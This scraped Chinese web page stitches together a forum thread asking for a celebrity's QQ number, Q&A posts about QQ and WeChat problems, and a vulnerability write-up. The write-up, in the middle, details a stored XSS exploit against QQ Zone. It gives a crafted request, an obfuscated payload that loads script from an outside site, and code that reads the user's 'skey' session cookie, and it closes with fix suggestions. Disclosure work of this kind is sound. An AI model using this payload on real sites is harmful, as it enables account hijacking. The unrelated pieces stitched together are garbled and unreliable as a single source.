网络霸主安小超重回网络了吗？谁能告诉我QQ号？是传言，还是真的？_小超吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0可签7级以上的吧50个
本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：139贴子：
网络霸主安小超重回网络了吗？谁能告诉我QQ号？是传言，还是真的？
昨天我的一个同学和我说他认识了网络红人安小超，还告诉我他的QQ，我 本来以为他吹牛B呢。上网来证实一下
一直特别喜欢时装[SMILI...
没图你不来？情头阵
首先准备一个没气的打火...
【新故障/4G信号不稳定/...
一楼说了的话你们指定就...
我看到好多软件技术的，...
海爷镇楼 　 　 　　　...
rt，卖号转战天刀，需要...
你怎么要的他QQ？我很想知道
真的假的啊？？我加一下认识一下，他要是不理我就是骗子，哼
帅哥吗？我喜欢。。。。。。。。。。。。。。。。
还有别的帅哥QQ吗？给我甩两个再
无语了。。。。。。红人能做到这么没架子》》》》少见
楼主，我帮你证实了，貌似是真的
不排除是假冒的喔
那个小妹妹，我有好多帅哥的QQ呢，就是不给你，气死你
内&&容:使用签名档&&
保存至快速回贴
为兴趣而生，贴吧更懂你。&或谁能告诉我一个类似QQ软件一样的带有网络硬盘的_百度知道
谁能告诉我一个类似QQ软件一样的带有网络硬盘的
谁能告诉我一个类似QQ软件一样的带有网络硬盘的
可以到上申请一个专门的网络硬盘,免费的有32M的容量.
其他类似问题
为您推荐：
您可能关注的推广回答者：
qq软件的相关知识
其他1条回答
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁QQ空间存储型XSS漏洞的组合利用(图解)
QQ空间的新型漏洞我们再试试
1. QQ空间某处正则混乱，导致恶意构造。2. QQ空间某文件存在潜在风险3. 1+2 = 此漏洞&详细说明：1. 一开始的目标是这个http://b./cgi-bin/custom/modify_custom_window.cgi，这个页面是用来修改QQ空间模块内容的。这里我选择提交的是FLASH模块。 由于此请求，每请求一次都需要输入一个验证码，所以没办法直接在抓包工具里修改并发送。所以最初是用调试工具去修改DOM属性，然后写自定义值来一次一次的试，后来实在觉得太麻烦了，就自己临时写了个小工具。以下测试均用此工具进行，如下，&&&&&2. 开始试了此请求的几个参数（这里的参数是指qzml所发送的xml里的若干属性，例如width, height ,wmode etc ..），都被过滤了， 后来懒么，就把能写入内容的都改成了'\/&&..，结果侧漏了。。&测试的qzml请求参数大概是这样：encodeURIComponent('&qz:title type=&flash& moduleborder=&true&&xxx&/qz:title&&div&&qz:swf swfsrc=http://files.jb51.net/file_images/article/64.gif.swf& _fcksavedurl=&http://files.jb51.net/file_images/article/64.gif.swf&& _fcksavedurl=&http://files.jb51.net/file_images/article/64.gif.swf&& width=&\'\/&&& height=&\'\/&&& loop=&\'\/&&& waitforclick=&\'\/&&& wmode=&\'\/&&&/&&/div&'.replace(/\s/g,&+&)).replace(/%2B/g,&+&);&侧漏效果大概如下：（反正是类似这个效果，懒的回去抓图了。）&&&&&3. 开始分析侧漏原因。 发现height属性把其它属性都吞掉了。 于是其它参数复原，单个测试height，在height里加入单引号时， 服务器端的正则貌似就凌乱了。 同样有此现象的还有swfsrc 。&因为服务器那边是怎么匹配的，不清楚， 于是就开始各种构造测试，看服务器端输出。&反正测试了挺久。 具体就不详述。 因为服务器端输出的embed标签里，总是带着allowscriptaccess=&never&，导致我们调用的FLASH来执行脚本，所以最终目的，就是想用height来屏蔽掉allowscriptaccess=&never& 。&测试过程中，出现了以下几种阻碍。&3A. allowscriptaccess=&never& 成功被我们的height 吞掉， 但是src属性没了。服务器端输出如下代码:&&div style=&height: 142& id=&cst_flash&&&embed id=&flash& height=' src=http://ctc./ac/c.gif.swf _fcksavedurl=&http://ctc./ac/c.gif.swf& _fcksavedurl=&http://ctc./ac/c.gif.swf& autostart=&false& loop=&true& invokeurls=&false& allownetworking=&all& allowscriptaccess=&never& wmode=&' type=&application/x-shockwave-flash& width=&'& src=&& invokeurls=&false& scalemode=&noScale& allowscriptaccess='always&' embed=&embed& menu=&false&&&/div&&3B. 自己添加了src 属性， 但是发现服务器端又自己加上了allowscriptaccess=&never& 。。纠结了。服务器端输出如下代码：&&div style=&height: 142& id=&cst_flash&&&embed id=&flash& height=&/&& src=http://ctc./ac/c.gif.swf& width='&&34;src = http ' src=&/c.swf& allowscriptaccess=&never& allownetworking=&internal& invokeurls=&false& autostart=&true& menu=&false&& autostart=&false& loop=&true& invokeurls=&false& allownetworking=&all& allowscriptaccess=&never& wmode=&opaque& type=&application/x-shockwave-flash& scaleMode=&noScale& &&/div& &4. 对于各种无厘头，有时候还是要靠运气。 在3B的代码基础上，偶然发现，如果src属性里加了\'，就不会出现问题。 所以我们构造src地址为/c.swf?1=\'\'\'， 这样就不会出现allowscriptaccess参数了。&5. 但是问题接着来了，大家都知道，allowscriptaccess 默认是sameDomain的，哪里去找同域下的FLASH啊。 巧合的是，还真有一个可以用的。 在抓包QQ空间的时候，瞥见这么一个FLASH，&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=QZONE.frontPageAccessory.zoomDetect.onZoomChange&我一瞧， 后面这个QZONE.frontPageAccessory.zoomDetect.onZoomChange 不就是个JS函数么。 于是试了一下。&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=alert&果然可以弹出啊。 这样看来，我们可以利用下。 不过这个ctc. 和 模块的ctc. 还是不是一个域啊， 但是运气好，恰好， 这2个域名，貌似资源文件是一样的，或者有部分是一样的？ctc. 下面也有该FLASH文件。 如下：&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=alert&6. 所以，我们最终可以构造出FLASH的src为&/qzone/v6/accessory/plugin/zoom.swf?onchange=function(){s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,116,111,111,108,109,97,111,46,99,111,109,47,116,111,111,108,47,113,113,109,97,105,108,46,106,115);document.body.appendChild(s);}&1=\'\'\'\'&其中，前面是FLASH地址，onchange参数调用我们自己函数，1=\'\'\'\' 是为了屏蔽掉allowscriptaccess=&never&&7. 上面这个地址我们简写为{SWFURL}, 它是位于height属性里的，如下&height=&&\'/\& src={SWFURL} style=width:/ &&&8. = = 写不下去了。。 直接上最后的测试代码。 有点乱。。有些是测试残留，没实际意义，比如里的&"34; 这种。。&&qzml&:encodeURIComponent('&qz:title type=&flash& moduleborder=&true&&xxx&/qz:title&&div&&qz:swf swfsrc=http://files.jb51.net/file_images/article/64.gif.swf\' ALLOWSCRIPTACCESS autostart=true\'\"\u0009src\u0013=/c.swf / & && width=&&"34;src = http & height=&&\'/\& src=/qzone/v6/accessory/plugin/zoom.swf?onchange=function(){s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,116,111,111,108,109,97,111,46,99,111,109,47,116,111,111,108,47,113,113,109,97,105,108,46,106,115);document.body.appendChild(s);}&1=\'\'\'\' style=width:/ && loop=&true& waitforclick=&true& wmode=&&/&&/div&'.replace(/\s/g,&+&)).replace(/%2B/g,&+&)&9. 上面代码会调用我自己的网站的JS。 在调用JS这一步，&目测IE 应该是通杀吧？IE6没试过。vista+IE7, win7+IE8,9 是可以的。&Chrome 也是可以的，ff 下蛋疼了，需要给加上type=&application/x-shockwave-flash& 才行， 没去弄，这个属性应该也是可以加的上的。&10. 到这里， 可以alert, 可以跳转。&IE下的alert&&&&&Chrome下的跳转&&&&&11. 但是我们亲爱的cookies 没办法弹出来啊。&原因是，如前所述，模块的域是ctc. ，&而空间的域是qq.com ，没有办法跨域获取cookies。&不过好在，QQ空间开发人员为我们准备好了这一功能， 原理就是在当前页中，嵌入一个和父窗口同域的iframe页面，来进行通讯。&我们直接调用QQ空间开发人员写好的库，来获取cookies，代码如下：&QZONE.Cross.Client.getInstance().sendInvoke('QZFL.cookie.get', 'skey',function(str){alert(&您的skey是:&+str);});&效果如下：&&&需要说明的是： 获取cookies这一步，IE下有效，chrome 貌似错误了，粗略看了下，对于跨域请求，Qzone开发人员针对HTML5和普通的采用的是不同的方案，在chrome下莫名的悲剧了。。 我只是调用了你们开发人员写的东西，= = 悲剧别找我，哈哈修复方案：1. 服务器端在从提交过去的qzml这段XML里获取FLASH的属性时，正则写错了？ 只是猜测。2. 目测服务器端验证qzml是否合法的正则不够好， 像width, height 这种参数，直接\d{m,n}就可以吧。 貌似width ,height 属性里什么东西都可以写啊。 只在客户端限制width,height输入框长度为3，没什么实际作用的。。其它属性也一样，什么wmode只需要true|false 即可。3. 这个http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=function(){location='钓鱼网站'} 单独就是一个漏洞。&http://ctc./qzone/v6/accessory/plugin/zoom.swf?onchange=QZONE.frontPageAccessory.zoomDetect.onZoomChange 这个被利用的flash文件需修改一下。 在FLASH限制一下onchange 参数的值。&作者 gainover谁能告诉我为啥手机网络好好的，网页刷得出来，qq可以发消息，就微信消息发不出去_百度知道
谁能告诉我为啥手机网络好好的，网页刷得出来，qq可以发消息，就微信消息发不出去
提问者采纳
重启手机或重开网络。
你有微信吗
别听他瞎说微信服务器现在好的很。
好吧，真的是我手机问题
怎么解决的？
是用我这种方法吗？是就给个采纳吧！
我怎么知道
现在还上不去啊。
你重启手机了吗？如果按照他们说的把微信卸载也可以。只要把安装包保留着。直接从安装包上点安装，不费流量就可以了。
额什么？要不给个采纳，要不88。
我手机就是这么解决的。我是学信息技术的。
用我的方法肯定能解决。只是你不知道怎么操作而已。
不可以的话我会给好评吗
是用我的方法吗？
太骄傲了。
我就说嘛，肯定行的。
我去继续为他人服务哈哈！
提问者评价
太给力了，你的回答完美解决了我的问题！
其他类似问题
为您推荐：
其他2条回答
微信的服务器出问题了，马上就好了
你有微信吗？
现在能用吗
有时候我QQ上不去但同事的能用，这是正常的，因为我们不在同一个服务器
我刚刚试了能发能收
你的还不能用
把号发过来我试试
可以用我干嘛要发给你
哦好吧，你试试能采纳不
也许是软件安装时出现差错？卸载重下试试？
你微信能用吗
好吧，真的是我手机问题
重下试试，不行换个资源下载看看吧，其余我就没招了
哈哈……真的，试试也许就好了。？
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁您还未登陆，请登录后操作！
各位网络高手们，谁能告诉我怎样申请可以国际聊天的QQ.谢谢
申请，她男朋友在韩国，可是两个人想聊天和视频，却不知道怎样才能网上视频。
两个人都申请qq就可以了，两个人都用qq就可以聊天，不需要专门的软件。
除了qq以外，msn也是大家很常用的聊天软件。
另外skype也相当不错，尤其是视频的效果不错。
以上的软件都支持视频聊天，都是免费注册，都可以在国外跟国内来聊天。
的，他们用MSN或者别的什么聊天软件
您的举报已经提交成功，我们将尽快处理，谢谢！
大家还关注